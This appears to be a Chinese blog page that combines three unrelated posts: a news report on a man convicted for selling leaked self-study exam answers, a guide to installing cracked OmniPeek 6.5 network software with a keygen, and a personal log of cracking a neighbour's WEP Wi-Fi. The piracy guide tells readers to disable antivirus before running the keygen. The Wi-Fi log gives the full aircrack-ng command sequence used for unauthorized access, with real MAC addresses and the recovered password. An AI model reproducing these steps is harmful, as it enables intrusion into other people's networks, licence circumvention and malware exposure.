2013年8月14日星期三

男子QQ上叫卖英语自考答案被抓 称没想到是真的

上叫卖英语自考答案
  自己都没想到居然是真的
  全国高等教育自学考试前夜,有人以500元一份的价格在网上兜售英语试题及答案。南京玄武警方迅速出击将卖试题的人抓获,嫌疑人表示,自己也不知试题真假,只是想骗点钱花花。
  不过,警方经过鉴定发现,这些试题和答案都是真的,该嫌疑人的行为已经涉嫌故意泄露国家秘密罪。目前,该嫌疑人已获刑8个月,而他的上家也于近日落网。
  现代快报记者 陶维洲
  特约记者 杨维斌
  网上兜售试题答案
  2012年4月14日深夜,很多考生为第二天的自考英语科目而焦虑时,网上有个QQ号却异常活跃,正兜售第二天英语考试的试题和答案。这位卖家出价500元每份,并声称试题和答案绝对是真的。一时间,有些考生蠢蠢欲动,犹豫着是否要购买所谓的试题和答案。“各类考试前,经常有人在网上兜售所谓的试题和答案,其中很多都是骗人的。”民警介绍,虽然这个QQ非常活跃,但考生们并没有趋之若鹜。
  很快,南京玄武警方在辖区内一出租房中找到了嫌疑人林某。民警的出现显然打了林某一个措手不及,他正开着电脑飞速地操作着,为自己的“试题答案”寻找买家。在被抓获前,其已经卖出了一份试题答案。
  卖的试题答案居然是真的
  面对民警,林某很快交代了自己在网上兜售自考“试题和答案”的经过。林某交代,他的这份“试题和答案”是自己花800元从湖北一个网友处买来的,他也不知道真假。“我以500元的价格往外卖,只要卖出去两份我就赚了。”林某说。
  林某平时无所事事,每到有重大考试的时候,他便在网络上搜寻所谓的“试题答案”,然后买过来进行兜售,骗点钱花花。他不计较答案的真假,只要能卖出去赚来钱就行了。靠着这种连蒙带骗的手段,每年的几大考试都让林某赚了不少钱。
  那么林某所卖的试题、答案究竟是真是假?民警将缴获的试题、答案交给相关部门进行鉴定,得到的答复是,这是真的试题。对于这一结果,林某也很惊讶,他没想到自己花800元还真“淘”到了“金元宝”。不过,这一结果却让他的行为完全变了性质。“如果卖的是假试题和答案,林某涉嫌诈骗罪,而因其贩卖的是真试题,其行为已经涉嫌故意泄露国家秘密罪。”民警说。
  试题泄露渠道至今是个谜
  林某归案后,警方便对试题的来源展开调查。由于林某是通过网络联系上家的,经过一年多的摸排走访,警方于今年7月底明确了其上家的真实身份—湖北人杜某,并很快将其抓获。杜某今年29岁,在湖北主要从事教育培训工作。他的手上有好几个大的QQ群,都是教育培训的同行。湖北教育资源丰富,这些教育培训行业的人经常在QQ群上交流各大考试的“试题、答案”。杜某交代,他卖给林某的试题和答案就是从QQ群搞来的,具体谁发的他也搞不清楚了。“这种东西很多,难辨真假,反正我们对外卖,你信就买,不信就拉倒。”杜某坦承,他也不知道这是真的试题和答案。
  目前,对于试题的来源,警方仍在进一步调查之中。林某和杜某的行为都涉嫌故意泄露国家秘密罪,林某已被法院判处8个月有期徒刑。杜某则已被警方依法刑事拘留。
  比“罪”
  两个罪名相比,故意泄露国家秘密罪其衡量情节严重与否,主要看泄露的国家秘密密级,本案中自考试题及答案为绝密级,因此嫌疑人的行为已构成犯罪。而是否构成诈骗罪则要看涉案金额,根据相关司法解释,需达到3000元以上才能构罪。
  提醒考生
  买答案
  同样要担刑责
  倒卖考试试题、答案会被追究刑事责任,考生购买考试答案同样可能被追究刑事责任。今年2月,北京一位考生就因为购买高等教育自学考试试题,而被法院判定,其犯非法获取国家秘密罪,被判处有期徒刑1年,缓刑2年。
  北京考生王某2012年4月14日至4月15日参加了全国高等教育自学考试。为了准备考试,王某加入了一个自考考生的QQ群,和很多考生一起在上面交流考试信息。4月14日16时许,王某以500元的价格从这名卖题人手中网购了当次高等教育自学考试英语(二)的试卷试题答案,并于次日考试前通过电子邮箱收到了答案。
  法院经审理认为,王某无视国法,以购买的方式,非法获取国家秘密,其行为触犯了刑法,已构成非法获取国家秘密罪。鉴于王某能够如实供述犯罪事实,法院对其依法予以从轻处罚并宣告缓刑。

WildPackets OmniPeek 6.5安装文件+Keygen下载地址及安装教程

OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段 之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络 。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段 。OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括: · 基于信息包 流的专家分析系统和应用分析 ·交互式节点图 · 完整的七层协议解码 · 应用响应时间(ART)分析 · 安全功能 · 监控与报表 · RMON分布式分析。
Demo演示
【下载篇】
WildPackets OmniPeek 6.5安装文件+Keygen华为网盘下载地址:

【安装篇】
下面简要介绍一下安装过程
注:基于.net 2.0,安装过程中可能提示需要安装。
(一)解压缩Omnipeek 6.5.rar,双击解压后的文件夹中的setup.exe,看到如下界面,点击Install OmniPeek,如下图:
点击Install OmniPeek开始安装
(二)在弹出的新界面中,点击下一步Next,选择第二项Manual手工方式激活,如下图:
以“手工方式”激活
(三)打开安装目录中的Keygen.exe,会自动生成一组SN和Key,也可以点击Generate重新生成。注:运行此程序需要关闭杀毒软件,或者在杀毒软件中将keygen.exe添加信任)
(四)将上图中的Serial Number复制到下图中的Serial Number文本框里,Company Name可随便写。点击下一步Next。(注:Product里面选择第一个
输入序列号
(五)将Keygen.exe中的Activation Key复制到下图中的文本框,点击下一步Next。
输入“激活码”
(六)继续下一步,你懂的!直到安装结束。
 使用篇
1.打开程序,新建抓包程序:New Capture,如下图:
2.选择本地连接,开始本地连接网卡抓包
 演示篇

Packet输出

Peer


Graphs


Nodes

BT5 破解无线密码小记

算不上教程一类的文章吧,只是记录一下过程,方便下次自己翻翻
最近刚搬家,没来得及办宽带,可是又不能不上网,没办法,只能委屈下某个开无线的邻居了
我的是台式机,没有无线网卡,不过没关系,我当时在学校宿舍时为了研究无线买过一个USB的无线网卡,所以现在正好派上用场。
打开BT5R2的虚拟机,然后把usb网卡连接到虚拟机里面,但是这里出了个问题,虚拟机一直提示driver error! 试了很多遍都不行,然后想想以前在笔记本上用这个无线网卡的时候也是这么直接连上去的啊,而且也没有再另外装过驱动。想来想去不对劲,然后看着driver error想到驱动有问题,突然发现我把usb无线网卡插在usb3.0延长线的口上,会不会是这个问题:虚拟机里面不支持主板的usb3.0口!?于是将网卡拔下插到主板前面板2.0的口上,连接成功,搞定!
首先需要将网卡设置为监听模式并开启监听状态,打开一个终端窗口,输入:
点击(此处)折叠或打开
  1. airmon-ng start wlan0
  2. airodump-ng mon0

TP_LINK那个目标不错,而且也有人在上网,这样数据量会比较大,抓包比较快,最重要的是是WEP的,这样就不用跑字典了

CH显示是6,所以输入命令:
点击(此处)折叠或打开
  1. airodump-ng --ivs -w wocao -c 6 mon0
  2.     -c 这里我们设置目标AP的工作频道
        -w 后跟要保存的文件名
将抓的包保存为wocao文件,这个文件会自动在后面加个序号,第一次是01,第二次02以此类推,后缀是ivs
为了加速攻击过程,我们发送虚假构造的包,输入:
点击(此处)折叠或打开
  1. aireplay-ng -3 -b 00:19:E0:C8:45:8C -h 00:1C:BF:1A:1B:66 mon0
  2. 注:aireplay-ng -3 -b AP的mac -h 客户端的mac mon0 
 得到大量的反馈报文

这时候输入命令进行破解:
点击(此处)折叠或打开
  1. aircrack-ng wocao-01.ivs
  2. 注:后面是跟着之前设定的保存报文的文件名,注意01编号和ivs后缀
开始破解,说ivs不够,等5000,然后15000,然后20000,在19000多时破解成功

然后连接TP_LINK,输入密码为0054148087,注意不要中间的冒号,连接成功,开始上网咯。

我其实在昨天晚上就发现了这个无线点,当时晚上12点多了,那时候没有人连接上网,我发送的伪造连接的数据包获取ivs值太慢,挂了20分钟才2000多点,然后想算了,等明天晚上八九点应该会有人上网,到时候再弄,果然今天等了一会就发现有人上网了。

破解时需要有人连接上网,下面给出没有人连接时的两条命令,自己构造连接和伪造包攻击路由器
点击(此处)折叠或打开
  1. aireplay-ng -1 0 -a AP's MAC -h MyMAC mon0
  2. aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h MyMAC mon0
  3. 再运行
  4. aireplay-ng -3 -b AP的mac -h 客户端的mac mon0
  5. aircrack-ng 捕获的ivs文件